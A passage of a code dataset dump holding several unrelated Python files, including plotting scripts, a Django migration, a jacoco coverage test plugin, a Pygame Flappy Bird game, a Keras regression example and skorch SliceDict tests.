50)\npml.savefig('pop_size.pdf')\nplt.show()\n\nplt.figure(figsize=(10, 3))\nplt.title(\"MLE (red line = pooled MLE)\")\nplt.bar(x, thetaMLE)\nplt.plot([0, len(thetaMLE)], [thetaPooledMLE, thetaPooledMLE], color=\"red\")\nplt.xlim(0, 70)\nplt.ylim(0, 0.5)\npml.savefig('mle.pdf')\nplt.show()\n\nplt.figure(figsize=(10, 3))\nplt.title(\"posterior mean (red line=population mean)\")\nplt.bar(x, meantheta)\nplt.plot([0, len(meantheta)], [popMean, popMean], color=\"red\")\nplt.xlim(0, 70)\nplt.ylim(0, 0.5)\npml.savefig('post_mean.pdf')\nplt.show()\n\nplt.figure(figsize=(15, 10))\nplt.title(\"95% confidence interval\")\nfor (height, q, median) in zip(range(len(n)-1, 1, -1), CItheta, mediantheta):\n plt.plot([q[0], q[1]], [height, height], 'b', alpha=0.5)\n plt.plot(median, height, 'b*')\nplt.yticks(x)\nplt.show()\npml.savefig('CI.pdf')\nplt.show()","sub_path":"scripts/ebBinom.py","file_name":"ebBinom.py","file_ext":"py","file_size_in_byte":3131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"527278889","text":"\nfrom datetime import datetime\nimport json\nimport numpy as np\nimport os\nimport random\nfrom scipy.misc import imsave\nimport cv2\n\nimport argparse\nimport tensorflow as tf\n\n\ndef test():\n \"\"\"Test Function.\"\"\"\n print(\"Testing the results\")\n cap = cv2.VideoCapture('E:/CycleGAN-tensorflow-xhujoy/datasets/video/winter/winter_snow_drive_high_street_fair_1080p.mp4')\n x = 340\n # left top corner\n h = 800\n w = 800\n y = 150\n\n #model_setup()\n out = cv2.VideoWriter('output.avi', -1, 25.0, (256, 256))\n\n init = tf.global_variables_initializer()\n\n with tf.Session() as sess:\n sess.run(init)\n _checkpoint_dir='C:/Users/qxy9300/Documents/MA/02_Results/AGGAN_logs/exp_014/20191218-100450_switch40_thres_0.1'\n chkpt_fname = tf.train.latest_checkpoint(_checkpoint_dir)\n print('-------------------> ', chkpt_fname)\n # saver = tf.train.Saver()\n # tf.train.Saver().restore(sess, chkpt_fname)\n\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n\n # Read until video is completed\n while (cap.isOpened()):\n # Capture frame-by-frame\n ret, frame = cap.read()\n if ret == True:\n # Display the resulting frame\n # cv2.imshow('Frame',frame)\n crop_img = frame[y:y + h, x:x + w]\n resized_img = cv2.resize(crop_img, (256, 256))\n cv2.imshow('CroppedFrame', resized_img)\n\n out_img = save_images_bis(sess, crop_img)\n\n # write the flipped frame\n out.write(out_img)\n\n\n coord.request_stop()\n coord.join(threads)\n\ndef save_images_bis(sess, crop_img):\n \"\"\"\n Saves input and output images.\n\n :param sess: The session.\n :param epoch: Currnt epoch.\n \"\"\"\n\n names = ['input_A_', 'mask_A_', 'masked_inputA_', 'fakeB_',\n 'input_B_', 'mask_B_', 'masked_inputB_', 'fakeA_']\n\n fake_A_temp, fake_B_temp, masks, masked_ims = sess.run([crop_img,\n crop_img,\n crop_img,\n crop_img\n ], feed_dict={\n input_a: crop_img,\n input_b: crop_img,\n transition_rate: 0.1\n })\n tensors = [inputs['images_i'], masks[0], masked_ims[0], fake_B_temp,\n inputs['images_j'], masks[1], masked_ims[1], fake_A_temp]\n\n for name, tensor in zip(names, tensors):\n #image_name = name + str(i) + \".jpg\"\n\n if 'mask_' in name:\n out_img = np.squeeze(tensor[0])\n else:\n out_img = ((np.squeeze(tensor[0]) + 1) * 127.5).astype(np.uint8)\n\n return out_img\n\ntest()","sub_path":"AGGAN/evaluate_video.py","file_name":"evaluate_video.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"576968685","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('apldistro', '0001_initial'),\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Invoice',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('invoice_number', models.CharField(max_length=10, unique=True)),\n ('invoice_date', models.DateField()),\n ('total', models.PositiveIntegerField(null=True, blank=True)),\n ('category', models.CharField(max_length=1, default='S', choices=[('S', 'Store'), ('W', 'Web'), ('A', 'Alocation')])),\n ('status', models.CharField(max_length=1, default='P', choices=[('N', 'None'), ('P', 'Pending'), ('O', 'On Progress'), ('C', 'Cancel'), ('D', 'Delivered/Success')])),\n ('brand', models.ForeignKey(to='apldistro.Brand')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='TransactionDetail',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('article_code', models.CharField(max_length=200)),\n ('article_name', models.CharField(max_length=200)),\n ('article_size', models.CharField(max_length=50)),\n ('article_price', models.PositiveIntegerField()),\n ('quantity', models.PositiveIntegerField(blank=True)),\n ('sub_total', models.PositiveIntegerField(blank=True)),\n ('brand', models.ForeignKey(to='apldistro.Brand')),\n ('invoice', models.ForeignKey(to='apltransaction.Invoice')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.AlterUniqueTogether(\n name='transactiondetail',\n unique_together=set([('invoice', 'article_size', 'article_code')]),\n ),\n ]\n","sub_path":"apltransaction/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"330951969","text":"'''\nCreated on Feb 4, 2015\n\n@author: jono\n'''\nimport logging\nfrom . import ExtendedPlugin\nfrom ...interfaces.testcase import ContextHelper\nfrom ...interfaces.config import expand_devices\nfrom ...utils.cm import isofile\nfrom ...utils.version import Product\nimport os\nimport f5test.commands.shell as SCMD\nimport f5test.commands.rest as RCMD\nfrom ...base import AttrDict\nimport json\n\n\nLOG = logging.getLogger(__name__)\nTIMEOUT = 5\nPROJECT = 'bigiq-mgmt'\nRPM_FILE = 'jacoco-*.rpm'\nJACOCO_PACKAGE = 'jacoco-'\nDESTINATION = '/tmp'\nTRIGGER_FILE = '/service/restjavad/jacoco'\nEXEC_FILE = '/shared/tmp/jacoco.exec'\nJACOCO_HOST = '10.145.194.1'\nJAR_DIR = '/usr/share/java/rest'\nJARS = ['f5.rest.adc.shared.jar', 'f5.rest.asm-bigiq.jar',\n 'f5.rest.autodeploy.jar', 'f5.rest.bigiq-adc-core-config.jar',\n 'f5.rest.avr.jar', 'f5.rest.bigiq-adc.jar', 'f5.rest.cloud.jar',\n 'f5.rest.em.jar', 'f5.rest.indexing.jar', 'f5.rest.jar',\n 'f5.rest.security.afm.jar', 'f5.rest.security.asm.jar',\n 'f5.rest.security.base.jar', 'f5.rest.security.common.jar',\n 'f5.rest.security.shared.jar', 'f5.rest.security.websafe.jar']\nJAR_BUNDLE = '/tmp/jacoco_jars.tar.gz'\n\n\nclass Jacoco(ExtendedPlugin):\n \"\"\"\n Install jacoco RPM, enable it and collect results.\n \"\"\"\n enabled = False\n\n def options(self, parser, env):\n \"\"\"Register commandline options.\"\"\"\n parser.add_option('--with-jacoco', action='store_true',\n help=\"Enable jacoco plugin. (default: no)\")\n\n def configure(self, options, noseconfig):\n \"\"\" Call the super and then validate and call the relevant parser for\n the configuration file passed in \"\"\"\n super(Jacoco, self).configure(options, noseconfig)\n\n self.context = ContextHelper()\n if options.get('duts'):\n self.duts = expand_devices(options.duts)\n else:\n cfgifc = self.context.get_config()\n self.duts = [cfgifc.get_device()]\n self.is_installed = False\n\n def make_dirs(self, device):\n session = self.context.get_config().get_session()\n path = os.path.join(session.path, 'jacoco',\n device.get_address())\n path = os.path.expanduser(path)\n path = os.path.expandvars(path)\n if not os.path.exists(path):\n os.makedirs(path)\n return path\n\n def jenkins_upload(self, sshifc):\n session = self.context.get_config().get_session()\n filename = 'jacoco.exec.%s' % sshifc.address\n with self.context.get_rest(proto='http', address=JACOCO_HOST, port=8080) as rstifc:\n # Force to Connection: close. There seems to be a problem with Jetty & keep-alive.\n rstifc.api.no_keepalive = True\n\n LOG.info('Uploading jacoco.exec to Jenkins...')\n headers = {'Content-Type': 'multipart/form-data',\n 'Transfer-Encoding': 'chunked'}\n payload = AttrDict()\n payload.parameter = []\n payload.parameter.append(dict(name='id', value=session.name))\n payload.parameter.append(dict(name='fileName', value=filename))\n payload.parameter.append(dict(name='branch', value='foo'))\n payload.parameter.append(dict(name='version', value='foo'))\n payload.parameter.append(dict(name='jacoco.exec', file='file0'))\n s = json.dumps(payload)\n with sshifc.api.sftp().open(EXEC_FILE) as f:\n # restkit expects the file object to have a name attr\n f.name = filename\n rstifc.api.post('/job/ITE-management-adc-add-code-coverage/build',\n headers=headers, payload={'json': s, 'file0': f})\n\n # Upload .jars bundle here\n LOG.info('Uploading jars pack to Jenkins...')\n filename = os.path.basename(JAR_BUNDLE)\n payload.parameter = []\n payload.parameter.append(dict(name='id', value=session.name))\n payload.parameter.append(dict(name='fileName', value=filename))\n payload.parameter.append(dict(name='branch', value='foo'))\n payload.parameter.append(dict(name='version', value='foo'))\n payload.parameter.append(dict(name='jacoco.exec', file='file0'))\n s = json.dumps(payload)\n\n with sshifc.api.sftp().open(JAR_BUNDLE) as f:\n # restkit expects the file object to have a name attr\n f.name = filename\n rstifc.api.post('/job/ITE-management-adc-add-code-coverage/build',\n headers=headers, payload={'json': s, 'file0': f})\n\n # Trigger a coverage report task\n payload.parameter = []\n payload.parameter.append(dict(name='id', value=session.name))\n s = json.dumps(payload)\n rstifc.api.post('/job/ITE-management-adc-run-code-coverage/build',\n headers=headers, payload={'json': s})\n\n def startTest(self, test, blocking_context=None):\n \"\"\"Install RPM on DUTs (only once)\"\"\"\n if not self.is_installed:\n LOG.info('Enabling jacoco on DUTs...')\n for dut in self.duts:\n with self.context.get_ssh(device=dut) as sshifc:\n if not sshifc.api.exists(TRIGGER_FILE):\n iso = isofile(PROJECT, product=Product.BIGIQ)\n root = os.path.dirname(iso)\n jacoco_rpm = os.path.join(root, 'RPMS', 'noarch', RPM_FILE)\n SCMD.ssh.scp_put(ifc=sshifc, source=jacoco_rpm,\n destination=DESTINATION, nokex=True)\n try:\n sshifc.api.run('bigstart stop restjavad')\n if sshifc.api.exists(EXEC_FILE):\n sshifc.api.remove(EXEC_FILE)\n sshifc.api.run('tar -C {} -czvf {} {}'.format(JAR_DIR, JAR_BUNDLE, ' '.join(JARS)))\n sshifc.api.run('mount -n -o remount,rw /usr')\n sshifc.api.run('touch {}'.format(TRIGGER_FILE))\n sshifc.api.run('rpm -Uvh {}'.format(os.path.join(DESTINATION,\n RPM_FILE)))\n finally:\n sshifc.api.run('mount -n -o remount,ro /usr')\n sshifc.api.run('bigstart start restjavad')\n RCMD.system.wait_restjavad(self.duts)\n self.is_installed = True\n\n def finalize(self, result):\n \"\"\"Collect jacoco.exec results\"\"\"\n if self.is_installed:\n for dut in self.duts:\n LOG.info('Collecting jacoco results from %s...', dut)\n with self.context.get_ssh(device=dut) as sshifc:\n if sshifc.api.exists(TRIGGER_FILE):\n try:\n sshifc.api.run('bigstart stop restjavad')\n sshifc.api.remove(TRIGGER_FILE)\n sshifc.api.run('mount -n -o remount,rw /usr')\n sshifc.api.run('rpm -e {}'.format(JACOCO_PACKAGE))\n finally:\n sshifc.api.run('mount -n -o remount,ro /usr')\n sshifc.api.run('bigstart start restjavad')\n self.is_installed = False\n\n # Download the .exec file\n# path = self.make_dirs(dut)\n# SCMD.ssh.scp_get(ifc=sshifc, source=EXEC_FILE,\n# destination=path, nokex=True)\n\n self.jenkins_upload(sshifc)\n sshifc.api.run('rm -f {}'.format(EXEC_FILE))\n\n RCMD.system.wait_restjavad(self.duts)\n self.context.teardown()\n","sub_path":"f5test/noseplugins/extender/jacoco.py","file_name":"jacoco.py","file_ext":"py","file_size_in_byte":7918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"155206013","text":"class Solution:\n # iteration\n def preorder(self, root: 'Node') -> List[int]:\n stack, res = [root,], []\n while stack:\n node = stack.pop()\n if node:\n res.append(node.val)\n stack.extend(node.children[::-1])\n return res\n\n # recursive\n def preorder2(self, root: 'Node') -> List[int]:\n res = []\n if not root:\n return res\n res.append(root.val)\n for child in root.children:\n res.extend(self.preorder(child))\n return res","sub_path":"Week_02/589.N-ary_Tree_Preorder_Traversal.py","file_name":"589.N-ary_Tree_Preorder_Traversal.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"222951618","text":"# Import and Initialize\r\nimport pygame, mySprites\r\npygame.init()\r\nscreen = pygame.display.set_mode((288, 512))\r\n \r\ndef main():\r\n '''This function defines the 'mainline logic' for the Flappy Bird pygame.'''\r\n \r\n # Display\r\n pygame.display.set_caption(\"Flappy Bird\")\r\n \r\n # Entities\r\n background = pygame.image.load(\"background.png\")\r\n background = background.convert()\r\n screen.blit(background, (0, 0))\r\n \r\n # Sprites for: Pipe, ScoreKeeper, Coin, Bird, Ground, and PointZone\r\n pipe = mySprites.Pipe(screen)\r\n scoreKeeper = mySprites.ScoreKeeper()\r\n coin = mySprites.Coin(screen)\r\n bird = mySprites.Bird(screen)\r\n ground = mySprites.Ground(screen)\r\n pointZone = mySprites.PointZone(screen)\r\n allSprites = pygame.sprite.OrderedUpdates(pointZone, pipe, ground, coin, bird, scoreKeeper) \r\n \r\n # Load \"GameOver\" Image to Display After Game Loop Terminates\r\n gameover = pygame.image.load (\"Game Over.png\")\r\n \r\n # Background Music and Sound Effects\r\n pygame.mixer.music.load(\"background music.wav\")\r\n pygame.mixer.music.set_volume(0.2)\r\n pygame.mixer.music.play(-1)\r\n bing = pygame.mixer.Sound (\"bing.ogg\")\r\n bing.set_volume(0.6)\r\n \r\n died = pygame.mixer.Sound(\"died.ogg\")\r\n died.set_volume(0.6)\r\n \r\n # ACTION\r\n \r\n # Assign \r\n clock = pygame.time.Clock()\r\n keepGoing = True\r\n \r\n # Loop\r\n while keepGoing:\r\n \r\n # Time\r\n clock.tick(30)\r\n \r\n # Events\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n keepGoing = False\r\n elif event.type == pygame.KEYDOWN:\r\n # When the space key is pressed, the go_up() method from the bird class is called\r\n if event.key == pygame.K_SPACE:\r\n bird.go_up()\r\n elif event.type != pygame.KEYDOWN:\r\n # If no key is pressed, the go_down() method from the bird class is called\r\n bird.go_down()\r\n \r\n # Check if the coin was hit, if so, 2 points will be added to the score as bonus \r\n if bird.rect.colliderect(coin):\r\n scoreKeeper.player_scored (2)\r\n coin.died()\r\n \r\n # Check if the bird had collided with the pipe\r\n if bird.rect.colliderect(pipe.rect):\r\n #Check if the bird has collided with a certain point on the pipe\r\n for y in range (0, pipe.rect.bottom):\r\n if bird.rect.collidepoint (pipe.rect.left, y):\r\n #If the bird did not collide with any points, continue the game\r\n if y in range (pipe.rect.centery - 30, pipe.rect.centery + 50): \r\n keepGoing = True\r\n # If the bird had collided with any of the points, terminate game\r\n else:\r\n keepGoing = False\r\n \r\n # Check if the bird had collided with pointzone\r\n if bird.rect.colliderect (pointZone.rect):\r\n #Add one point and plays sound effect\r\n scoreKeeper.player_scored (1)\r\n bing.play()\r\n \r\n # End game loop when the player hits the ground\r\n if bird.lost():\r\n pygame.mixer.music.fadeout(2000)\r\n keepGoing = False\r\n \r\n # Check to see if the player has beat the game, if so end the game loop\r\n if scoreKeeper.winner():\r\n pygame.mixer.music.fadeout(2000)\r\n keepGoing = False\r\n \r\n # Check to see if the player is at the half way point of the game, if so, change the background\r\n if scoreKeeper.half_way():\r\n background = pygame.image.load(\"night background.png\")\r\n background = background.convert()\r\n screen.blit(background, (0, 0)) \r\n \r\n # Refresh screen\r\n allSprites.clear(screen, background)\r\n allSprites.update()\r\n allSprites.draw(screen)\r\n \r\n pygame.display.flip()\r\n \r\n #Play ending sound effect \r\n died.play()\r\n # Blit gameover message\r\n screen.blit(gameover, (50, 150))\r\n pygame.display.flip()\r\n # Delay to close the game window\r\n pygame.time.delay(3000) \r\n \r\n # Close the game window\r\n pygame.quit() \r\n \r\n# Call the main function\r\nmain()","sub_path":"Flappy Bird.py","file_name":"Flappy Bird.py","file_ext":"py","file_size_in_byte":4384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"238493085","text":"import os.path\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\n\nfrom tornado.options import define, options\ndefine(\"port\", default=8010, help=\"run on the given port\", type=int)\ndefine(\"debug\", default=0, help=\"1:watch in real time (debug mode)\", type=bool)\n\nclass IndexHandler(tornado.web.RequestHandler):\n def get(self):\n self.render('index.html', colors=10, url=\"http://paletta.mrk1869.com\", title=\"Paletta - HSV Color palette for every Programmer\")\n\nif __name__ == '__main__':\n tornado.options.parse_command_line()\n app = tornado.web.Application(\n debug=options.debug,\n handlers=[(r'/', IndexHandler)],\n template_path=os.path.join(os.path.dirname(__file__), \"templates\"),\n static_path=os.path.join(os.path.dirname(__file__), \"static\")\n )\n http_server = tornado.httpserver.HTTPServer(app)\n http_server.listen(options.port)\n tornado.ioloop.IOLoop.instance().start()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"527576125","text":"import random\ndado1 = random.randint(1,10)\ndado2 = random.randint(1,10)\nsoma = dado1+dado2\ndinheiro = 10\nwhile True:\n num1 = int(input(\"Digite um número: \"))\n num2 = int(input(\"Digite outro número: \"))\n if somanum2:\n print(\"Soma maior\")\n else:\n print(\"Soma no meio\")\n break\nprint(\"Você tem {0} dinheiros disponíveis\".format(dinheiro))\nnum_chutes = int(input(\"Quantos chutes você quer comprar? \"))\ndinheiro-=num_chutes\nwhile True:\n if num_chutes==0:\n break\n else:\n chute = int(input(\"Qual foi a soma dos dados? \"))\n if chute == soma:\n dinheiro+=dinheiro*3\n break\n else:\n num_chutes-=1\nprint(\"Você terminou o jogo com {0} dinheiros\".format(dinheiro))","sub_path":"backup/user_259/ch131_2020_04_01_17_27_53_169153.py","file_name":"ch131_2020_04_01_17_27_53_169153.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"266423706","text":"import numpy as np\nfrom keras.engine import Model\nfrom keras.layers import Dense\nfrom keras.optimizers import SGD\nfrom keras.regularizers import l2\nfrom matplotlib import pyplot as plt\n\nfrom src.bayesian.utils import DrawUnivariateEpistemicUncertaintyCallback\nfrom src.bayesian.callbacks import ModelTest\nfrom src.bayesian.utils import univariate_function_example, univariate_regression_dataset, build_net_architecture, \\\n create_arg_parser\n\n\ndef create_model(X, dropout=0.1, weight_decay=0.01, learning_rate=0.01, learning_rate_decay=1e-5, **kwargs):\n inputs, outputs = build_net_architecture(X.shape[1],\n hidden_neurons=[50, 25],\n activation=['relu', 'sigmoid'],\n weight_decay=weight_decay,\n drouput=dropout)\n last_layer = outputs[0]\n output = Dense(1,\n activation='linear',\n kernel_regularizer=l2(weight_decay) if weight_decay and weight_decay > 0 else None,\n bias_regularizer=l2(weight_decay) if weight_decay and weight_decay > 0 else None)(last_layer)\n model = Model(inputs=inputs, outputs=[output])\n optimiser = SGD(lr=learning_rate, decay=learning_rate_decay)\n model.compile(loss='mean_squared_error', optimizer=optimiser)\n return model\n\n\ndef main():\n parser = create_arg_parser()\n args = parser.parse_args()\n X, y = univariate_regression_dataset()\n if args.verbose:\n print(args.__dict__)\n print('Building model...')\n\n model = create_model(X, **args.__dict__)\n mc_callback = ModelTest(X, y, T=10, test_every_X_epochs=1, loss='euclidean', verbose=0)\n if args.verbose:\n print('model architecture: (layer name, input shape, output shape)')\n for l in model.layers:\n print(type(l), l.input_shape, l.output_shape)\n plt.close('all')\n plt.ion()\n fig, ax = plt.subplots()\n\n x_draw = np.linspace(X.min() - 0.5, X.max() + 0.5, 100).reshape(-1, 1)\n y_draw = univariate_function_example(x_draw)\n draw_callback = DrawUnivariateEpistemicUncertaintyCallback(\n x=x_draw,\n y=y_draw,\n T=args.T,\n ax=ax,\n fig=fig,\n x_train=X,\n y_train=y,\n p_dropout=args.dropout,\n weight_decay=args.weight_decay)\n callbacks = [draw_callback, mc_callback]\n else:\n callbacks = [mc_callback]\n\n model.fit(X, y, batch_size=args.batch_size, epochs=args.epochs,\n callbacks=callbacks, verbose=1 if args.verbose else 0)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/examples/callback.py","file_name":"callback.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"172739659","text":"import os\n\n\n\"\"\"\ndeletes labels without images to prevent errors\n\nParameters\n----------\n\nimages_folder: str\n images path\n\nlabels_folder: str\n labels path\n\n\"\"\"\n\n\ndef delete_images_with_no_labels(images_folder, labels_folder):\n\n images = [image.split(\".\")[0] for image in os.listdir(images_folder)]\n labels = [label.split(\".\")[0] for label in os.listdir(labels_folder)]\n\n labels_extension = os.listdir(labels_folder)[0].split(\".\")[1]\n\n intersection = set(labels).intersection(images)\n\n labels_with_no_images = set(labels) - intersection\n\n [os.remove(labels_folder+\"/\"+label+\".\"+labels_extension) for label in labels_with_no_images]\n","sub_path":"training_api/api/tfrecord_module/more_labels_than_images.py","file_name":"more_labels_than_images.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"213414731","text":"def solution(line):\n # 缩进请使用 4 个空格,遵循 PEP8 规范\n # 返回处理后的结果\n if len(line) == 1:\n return line\n\n line = line.split(\",\")\n if line[-1] > line[0]:\n return line[len(line)//2]\n for i in range(len(line)-1):\n if int(line[i]) > int(line[i+1]):\n return line[(len(line)//2 + i+1) % len(line)]\n\n\nif __name__ == \"__main__\":\n # line = \"1\"\n # line = \"1,2,3\"\n # line = \"4,5,6,7,0,1,2\"\n line = \"12,13,14,5,6,7,8,9,10\"\n res = solution(line)\n print(res)\n","sub_path":"小米/找出旋转有序数列的中间值.py","file_name":"找出旋转有序数列的中间值.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"15002781","text":"\"\"\"Test for helper.py\"\"\"\nimport pickle\n\nimport numpy as np\nimport pytest\nimport torch\nfrom sklearn.datasets import make_classification\n\n\nclass TestSliceDict:\n def assert_dicts_equal(self, d0, d1):\n assert d0.keys() == d1.keys()\n for key in d0.keys():\n assert np.allclose(d0[key], d1[key])\n\n @pytest.fixture\n def data(self):\n X, y = make_classification(100, 20, n_informative=10, random_state=0)\n return X.astype(np.float32), y\n\n @pytest.fixture(scope='session')\n def sldict_cls(self):\n from skorch.helper import SliceDict\n return SliceDict\n\n @pytest.fixture\n def sldict(self, sldict_cls):\n return sldict_cls(\n f0=np.arange(4),\n f1=np.arange(12).reshape(4, 3),\n )\n\n def test_init_inconsistent_shapes(self, sldict_cls):\n with pytest.raises(ValueError) as exc:\n sldict_cls(f0=np.ones((10, 5)), f1=np.ones((11, 5)))\n assert str(exc.value) == (\n \"Initialized with items of different lengths: 10, 11\")\n\n @pytest.mark.parametrize('item', [\n np.ones(4),\n np.ones((4, 1)),\n np.ones((4, 4)),\n np.ones((4, 10, 7)),\n np.ones((4, 1, 28, 28)),\n ])\n def test_set_item_correct_shape(self, sldict, item):\n # does not raise\n sldict['f2'] = item\n\n @pytest.mark.parametrize('item', [\n np.ones(3),\n np.ones((1, 100)),\n np.ones((5, 1000)),\n np.ones((1, 100, 10)),\n np.ones((28, 28, 1, 100)),\n ])\n def test_set_item_incorrect_shape_raises(self, sldict, item):\n with pytest.raises(ValueError) as exc:\n sldict['f2'] = item\n assert str(exc.value) == (\n \"Cannot set array with shape[0] != 4\")\n\n @pytest.mark.parametrize('key', [1, 1.2, (1, 2), [3]])\n def test_set_item_incorrect_key_type(self, sldict, key):\n with pytest.raises(TypeError) as exc:\n sldict[key] = np.ones((100, 5))\n assert str(exc.value).startswith(\"Key must be str, not <\")\n\n @pytest.mark.parametrize('item', [\n np.ones(3),\n np.ones((1, 100)),\n np.ones((5, 1000)),\n np.ones((1, 100, 10)),\n np.ones((28, 28, 1, 100)),\n ])\n def test_update_incorrect_shape_raises(self, sldict, item):\n with pytest.raises(ValueError) as exc:\n sldict.update({'f2': item})\n assert str(exc.value) == (\n \"Cannot set array with shape[0] != 4\")\n\n @pytest.mark.parametrize('item', [123, 'hi', [1, 2, 3]])\n def test_set_first_item_no_shape_raises(self, sldict_cls, item):\n with pytest.raises(AttributeError):\n sldict_cls(f0=item)\n\n @pytest.mark.parametrize('kwargs, expected', [\n ({}, 0),\n (dict(a=np.zeros(12)), 12),\n (dict(a=np.zeros(12), b=np.ones((12, 5))), 12),\n (dict(a=np.ones((10, 1, 1)), b=np.ones((10, 10)), c=np.ones(10)), 10),\n ])\n def test_len_and_shape(self, sldict_cls, kwargs, expected):\n sldict = sldict_cls(**kwargs)\n assert len(sldict) == expected\n assert sldict.shape == (expected,)\n\n def test_get_item_str_key(self, sldict_cls):\n sldict = sldict_cls(a=np.ones(5), b=np.zeros(5))\n assert (sldict['a'] == np.ones(5)).all()\n assert (sldict['b'] == np.zeros(5)).all()\n\n @pytest.mark.parametrize('sl, expected', [\n (slice(0, 1), {'f0': np.array([0]), 'f1': np.array([[0, 1, 2]])}),\n (slice(1, 2), {'f0': np.array([1]), 'f1': np.array([[3, 4, 5]])}),\n (slice(0, 2), {'f0': np.array([0, 1]),\n 'f1': np.array([[0, 1, 2], [3, 4, 5]])}),\n (slice(0, None), dict(f0=np.arange(4),\n f1=np.arange(12).reshape(4, 3))),\n (slice(-1, None), {'f0': np.array([3]),\n 'f1': np.array([[9, 10, 11]])}),\n (slice(None, None, -1), dict(f0=np.arange(4)[::-1],\n f1=np.arange(12).reshape(4, 3)[::-1])),\n ])\n def test_get_item_slice(self, sldict_cls, sldict, sl, expected):\n sliced = sldict[sl]\n self.assert_dicts_equal(sliced, sldict_cls(**expected))\n\n def test_slice_list(self, sldict, sldict_cls):\n result = sldict[[0, 2]]\n expected = sldict_cls(\n f0=np.array([0, 2]),\n f1=np.array([[0, 1, 2], [6, 7, 8]]))\n self.assert_dicts_equal(result, expected)\n\n def test_slice_mask(self, sldict, sldict_cls):\n result = sldict[np.array([1, 0, 1, 0]).astype(bool)]\n expected = sldict_cls(\n f0=np.array([0, 2]),\n f1=np.array([[0, 1, 2], [6, 7, 8]]))\n self.assert_dicts_equal(result, expected)\n\n def test_slice_int(self, sldict):\n with pytest.raises(ValueError) as exc:\n # pylint: disable=pointless-statement\n sldict[0]\n assert str(exc.value) == 'SliceDict cannot be indexed by integers.'\n\n def test_len_sliced(self, sldict):\n assert len(sldict) == 4\n for i in range(1, 4):\n assert len(sldict[:i]) == i\n\n def test_str_repr(self, sldict, sldict_cls):\n loc = locals().copy()\n loc.update({'array': np.array, 'SliceDict': sldict_cls})\n # pylint: disable=eval-used\n result = eval(str(sldict), globals(), loc)\n self.assert_dicts_equal(result, sldict)\n\n def test_iter_over_keys(self, sldict):\n found_keys = {key for key in sldict}\n expected_keys = {'f0', 'f1'}\n assert found_keys == expected_keys\n\n def test_grid_search_with_dict_works(\n self, sldict_cls, data, classifier_module):\n from sklearn.model_selection import GridSearchCV\n from skorch import NeuralNetClassifier\n\n net = NeuralNetClassifier(classifier_module)\n X, y = data\n X = sldict_cls(X=X)\n params = {\n 'lr': [0.01, 0.02],\n 'max_epochs': [10, 20],\n }\n gs = GridSearchCV(net, params, refit=True, cv=3, scoring='accuracy',\n iid=True)\n gs.fit(X, y)\n print(gs.best_score_, gs.best_params_)\n\n def test_copy(self, sldict, sldict_cls):\n copied = sldict.copy()\n assert copied.shape == sldict.shape\n assert isinstance(copied, sldict_cls)\n\n def test_fromkeys_raises(self, sldict_cls):\n with pytest.raises(TypeError) as exc:\n sldict_cls.fromkeys(['f0', 'f1'])\n\n msg = \"SliceDict does not support fromkeys.\"\n assert exc.value.args[0] == msg\n\n def test_update(self, sldict, sldict_cls):\n copied = sldict.copy()\n copied['f0'] = -copied['f0']\n\n sldict.update(copied)\n assert (sldict['f0'] == copied['f0']).all()\n assert isinstance(sldict, sldict_cls)\n\n def test_equals_arrays(self, sldict):\n copied = sldict.copy()\n copied['f0'] = -copied['f0']\n\n assert copied == copied\n assert not copied == sldict\n assert copied != sldict\n\n def test_equals_arrays_deep(self, sldict):\n copied = sldict.copy()\n copied['f0'] = np.array(copied['f0'].copy())\n\n assert copied == copied\n assert copied == sldict\n\n def test_equals_tensors(self, sldict_cls):\n sldict = sldict_cls(\n f0=torch.arange(4),\n f1=torch.arange(12).reshape(4, 3),\n )\n copied = sldict.copy()\n copied['f0'] = -copied['f0']\n\n assert copied == copied\n assert not copied == sldict\n assert copied != sldict\n\n def test_equals_tensors_deep(self, sldict_cls):\n sldict = sldict_cls(\n f0=torch.arange(4),\n f1=torch.arange(12).reshape(4, 3),\n )\n copied = sldict.copy()\n copied['f0'] = copied['f0'].clone()\n\n assert copied == copied\n assert copied == sldict\n\n def test_equals_arrays_tensors_mixed(self, sldict_cls):\n sldict0 = sldict_cls(\n f0=np.arange(4),\n 